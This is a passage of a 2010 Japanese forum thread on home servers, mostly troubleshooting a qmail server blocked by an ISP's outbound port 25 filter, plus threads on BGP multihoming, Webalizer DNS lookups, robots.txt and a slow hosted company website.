悪い、サブミッションポートに対応の書き方が悪かった。 サブミッションポートと言っても25番で送信するのではなく587で送信するようにするって意味。 とはいえ、サブミッションポート自体MTAよりMUA寄りの救済措置なので、できる所とできない所があったりとややこしい。 なので自宅鯖のユーザーでOP25Bに該当してる人は ISP側が対応してればISPのメール鯖経由でメールを送出するようにしている人が多いかな。 ISPごとに設定が微妙に違ったりするので、Google先生にでも聞いて解説サイトを見ながら試行錯誤してみるよろし。 136の質問はサブミッションポートに対応したと書いてるが、 それは自身の待ち受けを587に対応して25番ポートの待ち受けを消したのが問題だと思う。 これから会議なので、自分が教えれるのはここまで。
139 :
100 :2010/05/23(日) 17:11:04 ID:ZBJo7cFl
>>138 ありがとうございます!
なんて優しい方なんだと感激しました。
>126 簡単設定はプロバイダの設定の話だから、FWとかは詳細で弄るのが正解。 だから、どういった感じというか、許可した設定だけ通るだけの話
>>139 プロバイダーどこ?
それぞれで、アドバイスできますよ。
プロバイダーによっては止めている所も有るから。
142 :
100 :2010/05/23(日) 18:17:28 ID:ZBJo7cFl
>>141 鯖に使っているプロバイダは t-com です。
簡単な状況を説明いたします。
別回線として emobile を使用し,
メーラは iPhone デフォルトのものを使っています。
遠方の友人と私は自鯖のメアド同士のメールのやり取りはできています。
しかしながら 自鯖メアドから Yahoo などの外部メールへは
送信ができても相手方に送られていない、
逆に Yahoo から自鯖メアドに送信しても受信できていません。
>>142 t-comで固定IPなんてサービス無いだろ。
で
SMTP検証が必要なようだね。
プロバイダーメールアドレス以外が送れるかどうかは書いていないな。
OEなどで設定して自分のドメインを送信元アドレスで携帯に送ってみて送れれば大丈夫。
送れた方法と同じ方法で送るようにメールサーバーの設定をする。
送れなければ、それを解決しないとメールの設定しても無理。
ところで今構築しているのにqmailを選ぶのは何でなんだろう。 postfixとかの方がいいんじゃない?今時の技術にもそのまま対応しているよ
145 :
100 :2010/05/23(日) 19:33:39 ID:ZBJo7cFl
>>143 t-com で割り当てられている グローバルIPのことです。
それを静的マスカレードで自鯖に割り当てました。
おそらくルータを再起動したら別のIPになるかもしれませんね。
勉強不足で申し訳ありませんが OE とはなんでしょうか?
ぐぐってもよくわかりませんでした。
おうtぉおけxpれっs
>>145 とりあえずそのままサブミッション開放してもオープンリレー鯖になってそうだから
一から勉強しなおしてくれないかな。踏み台にされて困るのお前だけじゃないんだよ。
>>145 どう見ても動的グローバルアドレスです。本当にありがとうございました。
で、OEはOutlookExpressの略。実際のところ今のお前さんがやれることは
ISP変えるか、自宅鯖スッパリ諦めるかのどちらかしかない。
150 :
100 :2010/05/23(日) 22:01:37 ID:ZBJo7cFl
>>148 たしかに rcphost を今現在削除しているので
spam 業者の温床になりそうですね。
本当に震えています。
submission ポートはもう既に解放してしまっていますよ。
>>149 そう仰らずにどうすればいいかもう一度ヒントいただけませんか?
151 :
100 :2010/05/23(日) 22:33:41 ID:ZBJo7cFl
>>143 試しに携帯へメールを送ってみましたが結果は×でした。
どのような対策をとればよろしいのでしょうか?
ご教示よろしくお願い致します。
あれだけヒント出したからもう解決したと思ったらまだやってるのか。
固定IPアドレスと言い張って実は動的、リレー対策のチェックすらやってないのかな。
>>144 自分はqmail-scannerを入れて冗長化させてアプライアンスみたいな使い方してる。
外部VPSと連携して対SPAMerへリソース不足になるように悪さをする無駄機能もある。
新しい技術に対応するにはパッチ追加が必要だが、
現時点で出ている技術に対応できるし設定次第で大規模なシステムに利用できるんだよね。
>>150 メール鯖を構築したらまずこれでリレーチェックだけはやっとけ。
ttp://www.abuse.net/relay.html お前さんができる事は143が出してる結論しかない。
その結果も×であれば、149が言うようにISP変更か諦めるかのいずれしかないよ。
153 :
100 :2010/05/23(日) 22:49:51 ID:ZBJo7cFl
>>152 リレーチェックの結果ですが・・・
Relay test result
Could not connect, test failed.
でした・・・
155 :
100 :2010/05/23(日) 23:13:50 ID:ZBJo7cFl
>>154 一体何が起きてるんでしょうか?
北海道と東京を私の鯖を介してメールの送受信できております。
しかも両者とも鯖とは別回線を使っております。
本当に申し訳ありませんがもう一度アドバイスいただけませんでしょうか?
よろしくお願い致します
>>155 「私の鯖を介して」と言うが、単に双方がdestinationドメイン使ったからでローカル配送されたんでしょ。
外からのsmtp、pop3は通ってるってだけの話。
>>153 見る限り、今は通って無さそうだけど。
で、お前の鯖から「外」に飛ばないのはOP25Bだから、直接鯖からメール飛ばしたいなら
ISP変えないとどうにもならんよって結論はとっくの昔に出てる。諦めれ。
他のスレでやれよ
別にスレ違いってワケでもないが。 つかそう言うなら誘導しろよ。
160 :
DNS未登録さん :2010/05/23(日) 23:35:44 ID:ZBJo7cFl
>>156 うーん。。。と言う事は、ただ単にサブミッション ポート開けたからといって届く訳じゃないと言う事なんでしょうか?
ひとつ不思議な事があるんですが、サブミッション ポート開ける前に何故かYahoo Mailを受信できたって事です。
そういう事実があるもんでただ単純にOP25B が問題じゃないような気がしたんです。むしろqmail の設定の問題なんじゃないかと思ったんですよ。
そろそろ終わりにしていいか?
ISPの鯖経由でも送信できないなら既に手立てがないので、
ISPを変更するか、諦めるかのいずれしかない。
そもそもお前さんのサブミッションポートについての認識が間違ってる。
OP25Bされている環境だとプロバイダとは別のレン鯖上のメール送信ができなくなるので、
それができるようにする救済措置がサブミッションポート。
ルールとしてはSMTP-AUTHを用い、587番ポートを利用するが一般的だが、
25番ポート待ち受けを587に増やしただけの所もあるので、これを逆手に取った方法として、
>>134 に書いて
>>138 で補足したように待ち受けは25番で行いつつ、
MTAから外部鯖への送信を全て587番ポートにする方法で
全てではないが相手先によっては送信できるよって話。
>ひとつ不思議な事があるんですが、サブミッション ポート開ける前に何故かYahoo Mailを受信できたって事です。
IP25Bされていないからメールが届いただけ。
言うまでもなくIP25BとOP25Bは別物で、
IP25Bは自身から見て内向き25番ポートをブロック、OP25Bは外向き25番ポートをブロックする。
MTAは通常25番ポートを利用するので、IP25Bがされていると外部からメールの配信=受信ができなくなる。
OCNが詳しい参考図を出してるので参照されたし。
ttp://www.ocn.ne.jp/mail/info/op25b/ ttp://www.ocn.ne.jp/mail/info/ip25b/ t-comは固定IPアドレスを提供しておらず、OP25B実施プロバイダ、
>>151 で検証してるようにISPのリレーも許可されていないようなので、
お前さんの鯖で送信をするのは無理って結論。
>>160 >>99 から今に至るまでOP25Bが全く理解できてないのな。
ぶっちゃけ向いてないよ。怪我しないうちに諦めな。
自宅鯖でBGPを喋らせてマルチホーミングで運用してる人っています? もしやってる人がいればどういう環境でやってるのか教えてほしいです。 引っかかってるのは、PIアドレスとASを取得する以外に、 ISPとトランジット接続をする必要があるのかが良く分からない点で、 スタティックルーティングでIPアドレスを提供しているISPを少なくとも2社契約し、 自身への経路はそのISPから提供されているアドレスで広告するというのはNGなのでしょうか? いかんせん情報量が少なすぎて個人でするには課題が多く、 申請費用も決して安いわけではないので、どなたか助言をお願いします。
>>163 そもそも何をしたいのか目的を具体的に書いてくれないと何とも。
>>164 主に広いアドレスの取得と利用が目的ですね。
/22などの広いアドレスを仲間内でシェアできないかなと思っています。
一般的なフレッツ系の回線では/26以上の取得は無理ですし、
かと言ってデータセンタを利用するにはハウジングコストが高額ですし。
ISP自体は3社と契約しているので、
グローバルASを取得すればPIアドレス取得の条件が揃ったことになるのかな?と思っているのですが、
実際自宅鯖のジャンルで同じような事をやってる人がおらず、
そもそもフレッツ系の回線でグローバルASを運用しても良いのか分からないわけです。
個人向けフレッツだとその手のシェアは規約でアウトじゃないかなとか思いつつ、 それはそれとして自宅鯖のレベルの話じゃないし長くなりそうだから通技板いったほうがいいと思う。
>>165 そこまでやると、電気通信事業法の問題も出てきそうなレベルだと思う。
>165 tomochaとか言う人が個人?でPIアドレス取って多様な気がする。 ググれば直ぐ出てくる。
個人でとは考えたことなかった。 興味あるから報告してもらえるとうれしいな。
>>165 1.まずグローバルなAS番号取ることを前提にピアリング先・トランジット先を確保する
金があるなら簡単に片付くがそうでないなら猛烈に難しい(結局人と人とのつながりあいだから)
2.PIなIPv4グローバルアドレスブロックを日本国内で取得するには
実質的にJPNIC会員にならなければならないので会費を払って会員になる
英語ぺらぺらならAPNICから直接割り当てを受けてもいいだろう
3.同様にグローバルなAS番号を取得する
4.あとはこの二者を使ってピアリング先・トランジット先と接続折衝
BGP喋るルータ買ったりイーサネット専用線引いたり等々
複数のトランジット系ISPがゲートウェイルータを置いているデータセンターにラックを借りて
BGPを喋る対外接続点ルータはデータセンター内においてピアリング先・トランジット先とは
構内接続ケーブルでつなぎ、拠点にはそこからイーサネット専用線やダークファイバーで引き出す
のが多分一番安い
正直個人でやるレベルを越えている
>>168 彼女はIPv6だけだったとおもう
IPv6仮想網上でBGP4+で遊んでみる団体としてIHANetというのがあるから
まずそこのドキュメントを読んでみるとよいだろう
ttp://sites.google.com/site/internetundertunnels/Home
みんなありがd。自宅鯖なのに通信技術板っぽい話題ですいません。
>>170 氏、非常に参考になる詳細をありがとうございました。
申請自体はAPNICやJPNICのドキュメントが充実していましたが、
こういった分野の現場を見たことすらなかったので、
具体的にどういった環境の用意が必要なのかあたふたしてました。
コネがない自分にとってトランジット先の確保が課題になりそうです。残念。
当面はデータセンタで契約して自宅までIPsec冗長化で引っ張って仲間内で利用し、
スキルを磨いていつかチャレンジしたいと思います。
たくさんのご意見ありがとうございました。
172 :
DNS未登録さん :2010/05/24(月) 23:58:59 ID:wtQwEwO5
Mail 鯖について質問していいですか?
ダメとか言われたらどうするつもりですか?
174 :
100 :2010/05/25(火) 05:41:29 ID:wT83G3Zr
いいからさっさと質問書けよw
176 :
100 :2010/05/25(火) 20:09:47 ID:wT83G3Zr
>>175 どうしても外部鯖とのメールのやり取りをしたいんです。
諦められないんです。
みなさんのお力をもう少しだけ借りること出来ませんか?
FUCK OP25B ってことで
>176 よし、プロバイダを変えて固定IPになったら、面倒みたる。
ISP変えろって結論で終わった話でしょ。 ISP変えたの?
180 :
100 :2010/05/25(火) 22:32:24 ID:wT83G3Zr
>>179 変えてませんよ、変えれないんです。
理由は聞かないで下さい。
禁則事項です・・・
ちなみに t-com で submission port 提供してるみたいなんだけど
これ使えるのかな?
あと理由教えて欲しいのが、なんでOP25Bしてたのに一時期
Yahoo メールを鯖で受信できたのかって事なんですよ。
>180 >161
結局コイツ人の言う事全然聞いてないよな
お前さん全然人が書き込みした内容見てないだろ・・・
>>180 >変えてませんよ、変えれないんです。
じゃ無理。バイナラ。
はい次の人ー。
突然何w
てふてふじゃ仕方ない
他所にトンネルでも掘れ
わざとやってるんだろうから無視でいいだろ
190 :
100 :2010/05/26(水) 00:29:17 ID:GuzfR4N6
>>189 わざとじゃないよー
てかISP提供のサブミッションでおくれるようにすればいいの?
そうですね
わざとじゃなければ他の人のレスをきちんと理解しろ 理解できないうちは鯖運用なんてまだ早い、理解できるようになるまで勉強しろ 勉強して理解できるようになれば自然と解決できるから
195 :
100 :2010/05/26(水) 07:01:09 ID:XPQWyJxQ
196 :
100 :2010/05/26(水) 07:02:47 ID:XPQWyJxQ
>>192 コメントありがとな。
でもマジでわからんのよ。
t-com で代理にサブミッションで送信してくれるの?
だからよ、
>>161 に全部書いてあるだろうが。
読んだ? 読んでもわからなかった? わからなかったのはどこ?
小学生じゃねーんだから少しはお前も話の進め方を考えろ。
下手な煽りしたところでお前をNGにする奴が増えるだけだ。
>>196 そのサブミッションはt-com以外の(OP25Bしてる)ISPからt-comのメル鯖を使う手段であって
t-comの中から使う話じゃねぇよ。お前に残された手段はISP変更しかないの。
それが無理ならレン鯖でも借りてろよ。
199 :
100 :2010/05/26(水) 07:26:55 ID:XPQWyJxQ
>>198 そんなこと t-com の公式ページに書いてないじゃん?
むしろ、 t-com 以外のMail鯖を使ってる人は t-com でサブミッション使ってええよと読めるんだが?
僕間違ってる?
200 :
100 :2010/05/26(水) 07:28:49 ID:XPQWyJxQ
>>197 ISP の鯖でMail送信出来なかったらISP変えるしかないんだよね?
それは理解したよ、ISPの鯖から送る方法がわからん。
勝手にできるもんなの?
禁則事項です?ってのは無しな
>>199 間違ってる。
「t-comはOP25BしててISP外へのtcp:25は通らないからISP外のメル鯖使うときはサブミッション使ってね」
という意味。お前未だにOP25B理解できてないのな。
203 :
100 :2010/05/26(水) 08:10:23 ID:XPQWyJxQ
ホント他人の話を聞かない奴だな 鯖を立てたいという熱意は認める だがその前にきちんと知識を身に付けなさい まずはOP25Bについて正しく理解することから でないとこれ以上話は進まない
マゾっ気の多いスレになっちまったなぁ…
206 :
DNS未登録さん :2010/05/26(水) 14:20:41 ID:dZuYrlRL
OS fedora12 WebalizerのDNS逆引きが以上に時間が掛かったりエラー乱発しまくります これを高速化される、もしくは別のやり方はないでしょうか?
キャッシングNSをインストールする
208 :
206 :2010/05/26(水) 14:35:05 ID:dZuYrlRL
bindは入っています
nslookupを使った逆引きも遅い? もしそうであれば/etc/resolv.conf辺りを見直すと良いかもしれない。 ISPのネーム鯖を直接参照するとか。
先生、質問です 1.宅鯖と同じグローバルIPを共有しているマシンも攻撃の対象になるって認識で合ってる? 2.上記が正しい場合、例えば宅鯖以外のPC(windowsマシン等)での重要情報のやりとりを盗まれる危険性があるんじゃ… 3.となると宅鯖用回線と通常用の回線と二回線契約する以外に対策は? TCP/IPやハッキング手口についての文献を参考にしてるけど読めば読むほど 脅威について知らなかった部分が表面化してきて夜も眠れんのです 特にスニファリング、セッションハイジャック、スプーフィング等この辺りの対策はどんな感じにしてるのか気になる
忘れてた。宅鯖はwebサーバ、ゲームサーバとして使用するものとします
>>211 夜も眠れん
の相談だね。昔から言われているように羊の数を数えるのが良いじゃろう。
口蹄疫が羊に感染しそうで心配で眠れなくなる
>特にスニファリング、セッションハイジャック、スプーフィング等この辺りの対策はどんな感じにしてるのか気になる 回線を分けても変わらんと思うが・・・。 鯖・クライアント・ゲスト・テストは少なくとも分割した方が良いだろうね。 鯖側は基本に忠実なのと、何が動いてるのかを把握しアップデートを実施すること。 ゲーム鯖とか自分で作ってソースを把握している物なら構わないが、 信頼できるところがメンテナンスしてるのか分からない物とかは論外。 クライアント側も基本的な事ばかりなので端折るが、 日ごろから情報収集を怠らないようにするのは基本。
217 :
206 :2010/05/26(水) 18:10:04 ID:dZuYrlRL
nslookupも? そんなんでよくbindがどうって言えるな、、、まあ最近のbindは digかhost使えって言ってくるか
219 :
DNS未登録さん :2010/05/26(水) 18:35:54 ID:dZuYrlRL
webalizerのdns_cache.dbにどう活用するのかが分らないのです
221 :
206 :2010/05/26(水) 18:55:04 ID:???
>もしそうであれば/etc/resolv.conf辺りを見直すと良いかもしれない。 >ISPのネーム鯖を直接参照するとか。 これはやっています
>webalizerのdns_cache.dbにどう活用するのかが分らないのです webalizer.conf には DNS.README を読め、と書いてあるが、ちゃんと読んだか?
223 :
206 :2010/05/26(水) 21:50:52 ID:xEdilUiR
dns_cache.dbの最適化方法ちゃんと書いてあるよ。 nslookupはまた別の話でしょ。 卑屈になれとは言わんが逆切れするのもどうかと思う。
つかbindでキャッシュしてるならresolv.confはlocalhostに向けるべきじゃないか?
そもそも逆引きが遅いのかどうか切り分けるためにnslookup使えって話なのに
>>206 は何か大きな勘違いしてるよな
わかんないならわかんないってはじめから言えよ 中途半端なアドバイスや疑いで物言われてもなんのやくにもたたねぇよ 屑共が
流石にその釣り針は大きすぎる
RAID6に対応した SAS/SATA 8port以上のオヌネメPCIeのレイドカード教えろ。
OSはXPです。なるだけ安くして頂くようお願い申し上げるぽ。
>>201 多分親が回線の選択権を握ってて、ガキの
>>100 は手出し出来ないものと思われる。
じゃなきゃ賃貸や同居で変更出来ないと思われる。
>>229 ARC-1680系かな。XPのドライバあるかどうか知らんけど。
というかなぜここで聞いたし。
>>229 命令口調ながら丁寧語でワロタ
自宅鯖よりハードとか自作PC系の板で聞いた方がいいんじゃね?
自分はDELL鯖を使ってるので、PERC6とかを使ってるが。
サンクスコ
robots.txtで hogehoge.comを拒否して hogehoge.com/blog だけ許可したいんだけどどうやって書けばいいですか?
/blog以外のディレクトリを全部拒否する。
そのやり方を教えてくだされ User-agent: * Disallow: / Allow: /blog/ これでいいんでしょうか?
238 :
236 :2010/05/27(木) 18:02:32 ID:???
>>237 ありがとうございます
後一つ
blog.hogehoge.comと
hogehoge.com/blog
どっちでブログするのがいいでしょうか?なにか違いありますか?
好みだろ。俺は前者
240 :
DNS未登録さん :2010/05/27(木) 18:19:38 ID:UfikCWft
仕事で使うサーバーはどこに質問したらいいんでしょうか?? 新しく契約したハウジング業者が胡散臭くて困っとります。 誘導お願いします。
契約したなら諦めろよ。 複数の業者と競争させるとかせんかったんか?
大まかに説明すると PCに疎い会社の上層部が契約しちゃって(他社とも比べたとは言っていたが) 手に負えなくなり、 「おっキミ少しはPCに詳しいんだろ、この仕事は任せた」 みたいな感じなんですよね。 はっきりと胡散臭いと解れば契約解除してもいいんですけど 現状の問題点に対する向こうの言い分が 正しいのか間違ってるのか判断がつかなくて困ってたんです。 質問みたいになりますが、現状ではサーバーの速度が出ていないのが問題でして 向こうは回線が細いと言い張るんですが、サーバーの設定やルーティングに 問題はないのかとか聞くんですが、その辺の説明が曖昧で困ってました。
字面が違う。 利用者はドメインより中身を見ている。
>>242 OS別でWindowsかLinuxかUNIXに行くとか
>242 抽象的すぎて判断もつかん。
>>244 ありです。ただ自分もサーバーは余り詳しくないので(自作PC作れるくらいの詳しさです)
覗いてみたのですが、専門的すぎてチンプンカンプンでした;;
>>245 すません。あまり具体的に書き過ぎると質問になっちゃいそうで
スレの趣旨とずれるかと思って。
質問になってもいいのでしたら
現在、フレッツネクストのビジネス回線を2本入れているのですが
それでも、サーバーが重たいです。
自分の素人感覚だとビジネスの回線2本入れてもまだ回線が細いって
言われる事がどうも腑に落ちなくて、何か別に問題があるんじゃないかと思ったのです。
何のサーバーが重いんだよ
>>240 >>242 レンタルウェブサーバの話ならレンタルサーバ板
コロケーション・ハウジング関係の話なら通信技術板
のそれぞれの物凄い勢いで質問に答えるスレ系のスレに行け
>向こうは回線が細いと言い張るんですが、
この時点で顧客(
>>240 の会社)が要求する内容をそのホスティング屋は満たせていないんだから
契約解除すれば?
まあたまにコンテンツ側の作りがクソでどうやったって高速化無理だろみたいなのもあるが…
>>246 あー
もうそういうレベルなら全部解約して
コンテンツ作るところから全部やってくれるウェブ屋に丸投げしろ
何が分からないのかが分かっていない奴が質問してもロクな事にならんし
なによりそれが本業じゃないんだろ? 本来の職掌は別にあるんだろ?
250 :
DNS未登録さん :2010/05/27(木) 19:21:24 ID:8RQG5B3c
自宅サーバ2台で運用されている方いますか? 別々の用途で使おうと思っています。 今考えているのは 1台目 OS windows home server 主にファイルサーバ 2台目 OS windows server 2008 foundation 主にWebサーバ、FTPサーバ です。ただ気になるのが1台目のWHSでも80のポートを使ってしまっているんですがそれでも他にWebサーバ運用できますかね? 分かりにくいかもしれませんがよろしくお願いします。
>>250 どうせインターネット接続ルータで逆NATかけるんだろ。
外界に射影するポートを80ではなく81とか8080とかに変えりゃいいだろ
>>250 ああもう1台(物理でも仮想でもいい)用意してそいつをリバースプロキシにするという手もあるな
>>247 あっすません。WEBサーバーでした。自社HPが置いてあります。
>>248 通信技術板の方に行って見ますね。
コンテンツですが、今までのレンタルサーバーではサクサク動いてたので
ハウジングにしても同じく動くだろって思ったのです。
じゃレンタルにしとけよって自分も思うのですが
サーバー買ったからそれを使えって言われて会社と業者の間で板ばさみ状態です。
>>249 本業じゃないんですが自社HPが動かないのは本業にも支障が出るんです。
PCに疎い人が多くて他に業者と話が出来そうな人はいないし。
スレ違い失礼しました。
254 :
DNS未登録さん :2010/05/27(木) 19:38:50 ID:8RQG5B3c
>>253 まて
ハウジングということは
データセンター内にラック借りて、そのデータセンター業者からインターネット接続サービス買って、
自前でルータやファイアウォールやウェブサーバとなるコンピュータをラックに持ち込んで設置して
その上に自社のウェブサイトを構築したということか?
そのシステム(ネットワーク、OS、ミドルウェア、サービスデーモン その他一切)を構築したのはどこなのよ
>>255 スレチなのに気にかけていただいてありがとうです。
大まかには書かれてる通りです。
データセンター内にラックを借りて(正確には依頼した業者が持っているデータセンター内のラックの一部分のみ)
その、データセンターに回線を引き込んでます。回線の契約も依頼した業者に任せました。
依頼した業者が指定したサーバーマシン・ルーターを購入し
そこの業者が全てOSのインストールから何から何までセットアップしました。
元々、レンタルサーバーに自社HPを乗せていたのでそれを丸ごとコピーしてます。
ちょっと解り難い説明で申し訳ないです。
とりあえずボトルネックを切り分けてからじゃないと何とも。 鯖の負荷とかトラフィックとか調べた?
>>257 トラフィックのグラフ見せて貰ったので
その辺は、調べてるんだと思います。
トラフィックが頭打ちになってるんで、これは回線が細いってことです
もっと太い回線にしますってことで、ビジネス回線2本にしたのですが
体感速度は変りませんでした。
回線を変えても速度が変らないので、回線の問題じゃなくて設定が悪いんじゃないかと思ったんです。
で、ビジネス2本にした後のトラフィックは?
>>258 回線がつまった(´Д`)
→じゃあ回線を2本にしよう(・∀・)!
→速くならない(⊃д`)
というのはよく陥りがちなパターン。
パケットの動きをよく考えて
両方の回線にうまく分散するようにネットワークやサービスデーモンやDNSの設定を
構築していかないとまったく何の効果もない。純粋な無駄金。
>>255 ご愁傷様。
仕様書やらネットワーク構成図、機器構成を渡してもらった方が良いと思う。
IPアドレスとかパスワード以外をうpしてもらえれば切り分けしやすいかもしれんが。
レン鯖でサクサク動いてて専用鯖に変えてダメということは
しょぼい鯖を押し付けられたか、よほど重いミドルウェアを組み込んだのではないかと思う。
>>257 の言うようにログインできるなら、
topコマンドでCPU食ってるプロセスの特定、
hdparmでHDD速度の調査などパフォーマンス低下の原因を特定してからだな。
>>259 自分もあまり詳しくないので、上手くいえませんが
ビジネス2本の前はグラフを見ると頭打ちって言われりゃ理解できるようなグラフだったんですが
ビジネス2本のグラフは頭打ちには見えなかったです。
ただ、業者的には「グラフには現れてないけど頭を打ってるかもしれないです」と理解不能な回答をしてきました。
何か、具体的な数字を出した方がいいですか?そのときのグラフがちょっと手元にないんですが
転送量が26Mくらいって言ってました。
NTTに依頼した帯域測定結果とかは手元にありますが。
>>261 仕様書は完璧に稼動してから渡したいと言われまだ貰ってないです。
>>262 ろくな業者じゃないな。早いところ辞めた方がいい。
温泉つかってHPとSP上げるのって相方ごとに30分やんの?
いや、温泉だと相方ごとじゃない。 温泉の入浴剤は30分やる必要はあるね。
>>261 普通は構築前に仕様書を提示して
完成したら完工書類を渡すもんだろうがよ。
そんなところはさっさと切った方がいいぞ
267 :
250=254 :2010/05/27(木) 21:20:07 ID:8RQG5B3c
ルーターでtcp:80はちゃんと2台目にマッピングしてあるの?
っていうか、ポートフォワード使うなら8080でたてる必要ないんじゃないの?
>>262 26Mって26Mbps?26MB/s?
前者ならしょぼいルータ入れてればルータの性能が頭打ちかもしれん。
後者は色々弄る必要が出てくると思うけど、
正直業者の態度が頂けないので解約して別の所を探した方が良いと思う。
>>263 >>266 >>271 ちょっと今、資料を漁ってます。
最初は、26MB/Sって聞いていたんですが
ボトルネックをハッキリしようってことでNTTに回線の速度を測って貰ったんですが
その資料には帯域測定結果のアベレージが26Mbpsってなっててその辺の説明もあやふやなんですよね。
でも、ビジネス回線2本で26Mbpsってのもないなと思うんですよね。
ルーターとサーバーの型番がどっかの資料にあったと思うんで少しお待ちを
273 :
250=254 :2010/05/27(木) 21:54:29 ID:8pkiupd9
274 :
250=254 :2010/05/27(木) 21:57:13 ID:8pkiupd9
>273 DDNSのアドレスを正引きして、プロバイダからもらってるIPと相違がないか確認しろ。 あと、LAN内から見れないのか外からも見れないのかを確認しろ
277 :
250=254 :2010/05/27(木) 22:04:49 ID:8pkiupd9
279 :
250=254 :2010/05/27(木) 22:18:22 ID:8RQG5B3c
>>278 そうです。
簡単にまとめていただいてありがとうございますw
windows系の鯖使ったこと無いけど、 /home/default.aspx?gotodefault=true これは鯖の設定じゃないの?
ルーターは YAMAHA SRT100 これをファイヤーフォールに使用してるそうです。 YAMAHA RTX1500 ×2 これがルーターで4回線まで増やせるって説明を受けました。 ビジネス回線×2−−FW(SRT100)−−ルーター×2(RTX1500)−−HUB−−リモート電源−−サーバー みたいな構成です。 サーバーは WEBサーバー Power Edge R410 DNSサーバー Power Edge R200 メールサーバー Power Edge R200 DBサーバー Power Edge 2970 でした。ってここまで書くと見る人が見たら特定されそうですが… とりあえず、仕様書を持って来いと言っておきます。 あと、回線の契約も委託してしまっているので 本当にビジネス回線を引いているのかも不明です。実は、安い回線引いてる可能性もありますよね。 回線の開通の案内も同時に持ってこさせます。 ちょっとこの業者は考え物ですね。自分もそう思っていたのですが 皆様の意見を聞いて確信しました。 スレチなのにありがとうございます。
>>281 正直今まででの話だけで特定するのは難しいかもしれない。
ルータだけ見ても26Mbps以上はさばける性能はある。
ルータや各サーバの負荷状況を見て判断していくしかない。
メモリとかロードアベレージ等の負荷状況も教えてもらった方がいいと思う。
>>282 やっぱり、現状ではどこがネックかはハッキリできないですね。
とりあえず、回線の割には速度が出ていないと思うので
そこいらを踏まえつつ
問題を切り分けて、考えていきたいと思います。
ありがとうございました。
>>281 そこのSRT100が意味不明。
入ってるのそこじゃなくてルータの右側(2次側)じゃないの? あるいは2台あるか。
本当に1台しかなくてそこだとしたらなんかネットワーク設計がおかしいぞ
>>283 RTXって自分の経験だとそんなに捌けないイメージが強いんだけどなぁ。
VPNには最適なんだけどDoSに弱いというか。
それはともかくSRT100が怪しい気がする。
>>284 が指摘してる順番はともかくとして、
(自分も回線⇔ルータ⇔ファイアウォール⇔ハブ・・・って構成だと思う)
公式サイト見たらFWセッション数4096って書いてあるあたり、
こいつが足を引っ張ってる可能性が高い。
SRT100は自分使った事ないが、
このクラスの製品はIDS/IPSの全機能を有効にしてると
パフォーマンスががた落ちになることがある。
案外ファイアウォール外せばサクサク動くんじゃね。
あと本体も気になったことがあったのでついでに書いとこ。 2970に搭載してるRAIDカードって何? こいつがSAS5iだったらRAIDカードがボトルネックになってる可能性がある。 恐らくPERC5を積んでると思うが念のため。
287 :
94 :2010/05/29(土) 17:27:32 ID:DUcFKB5z
94で質問した後に時間があいてしまったのですが、すみませんが教えて下さい。 WinXP+ANHTTPDで自宅サーバーを作り、お名前.comでドメイン購入およびダイナミックDNS申し込みしました。 お名前.comのダイナミックDNSクライアントも正常に動作しているようで、"○○○○○.×××××.com"を更新しました(17:03)と 表示されるのですが、携帯電話からURLを入力してもホームページが見れません。 ちなみに、URLでなくIPアドレスを入力するとホームページが見れるので、ANHTTPDは正常に動作していて、ダイナミックDNSクライアントの 設定等がマズイのかな?と思っているのですが・・・ またURLは、○○○○○をホスト名、×××××.comをドメイン名としたとき、、○○○○○.×××××.comとなるのでしょうか? それとも、×××××.comだけで良いのでしょうか? 宜しくお願い致します。
>>287 dig host nslookup の3つのコマンドの1つでもわかれば答えは出るんだが。
>>287 DNSレコード設定で○○○○○.×××××.comと×××××.comを登録していればOK
290 :
287 :2010/05/29(土) 22:10:39 ID:DUcFKB5z
>>289 レンタルDNSレコード設定のほうでしょうか?
それとも、ネームサーバ設定で○○○○○.×××××.comと×××××.comを登録するのでしょうか?
>>288 ちょっとまだ理解できてませんが、勉強したいと思います。
とりあえず、URL貼れば検証してやるぞ
>これで日本国内のサーバーはすべて届け出が必要(罰則あり)というネタがタレコまれて >た [slashdot.jp]はずだけど。 >電気通信事業法 [slashdot.jp]どころの騒ぎじゃねーぞ。
放送法の改正のことかな? 規制というかネットのストリーミング配信でも地上波の放送局と同じような扱いになるってことだな。 総務省の権限一つで放送停止にできる。ちなみにこの前強行採決されてたと思ったけど…。
衆議院通ったからもう決定なのか?
言うまでもなく、衆議院の議決は参議院の議決に勝る
質問というよりボヤキですが… マックで10.5、自宅サーバでwikiもやりたいのに 肝心のサーバソフトがどこにも売ってない… オクとか見ても出品されてない… どこでも品切れ… あ、10.6はなしです、インテル入ってないんで
ダウンロード規制でP2P禁止の次は自宅鯖規制か
http://www.soumu.go.jp/main_content/000058204.pdf p13
「一般放送」とは、基幹放送以外の放送をいう。
(定義)
第二条 この法律及びこの法律に基づく命令の規定の解釈に関して
は、次の定義に従うものとする。
一 「放送」とは、公衆によつて直接受信されることを目的とす
る電気通信(電気通信事業法(昭和五十九年法律第八十六号)
第二条第一号に規定する電気通信をいう。)の送信(他人の電
気通信設備(同条第二号に規定する電気通信設備をいう。以下
同じ。)を用いて行われるものを含む。)をいう。
二 「基幹放送」とは、電波法(昭和二十五年法律第百三十一号
)の規定により放送をする無線局に専ら又は優先的に割り当て
られるものとされた周波数の電波を使用する放送をいう。
三 「一般放送」とは、基幹放送以外の放送をいう。
p103
(一般放送の業務の登録)
第百二十六条 一般放送の業務を行おうとする者は、総務大臣の登
録を受けなければならない。ただし、有線電気通信設備を用いて
行われるラジオ放送その他の一般放送の種類、一般放送の業務に
用いられる電気通信設備の規模等からみて受信者の利益及び放送
の健全な発達に及ぼす影響が比較的少ないものとして総務省令で
定める一般放送については、この限りでない。
自宅鯖は、個人ラジオ局と同じカテゴリーに入るくさい。
もしも個人ラジオ局扱いでない場合は p282 登録件数 一件につき九万円 払わないといけないようだ
レン鯖のアスリアみたいに 「法に反しないならなんでもやってOK」 ができなくなってる。妙な義務が多すぎ。 この義務ってのが登録しようがしてまいがかかってくるぽい 特に政治、選挙がらみの規定がめんどくさそう
鯖の定義は? 自分だけしか使えないけど外からも接続できるケースとか
>>303 TV局=基幹放送
それ以外みんな=一般放送
>>304 OSX10.4serverだとwikiサーバ構築機能なし、
10.6以降はインテル入ってなきゃだめ、
よって選択肢は必然的に10.5serverなのですが…
アップルは既に販売終了しているし(早!)
どこのショップでも品切れだし、
オクにも出品なし、なんです
>>306 なるほど。wikiがそのバージョンでないとってのが
よくわからんけど、特定のやつなんだろうか。
Amazonに1点だけ出品あるね。
>一 「放送」とは、公衆によつて直接受信されることを目的とする電気通信 ブラウザ経由でしかみれないから、直接でないのでOK
309 :
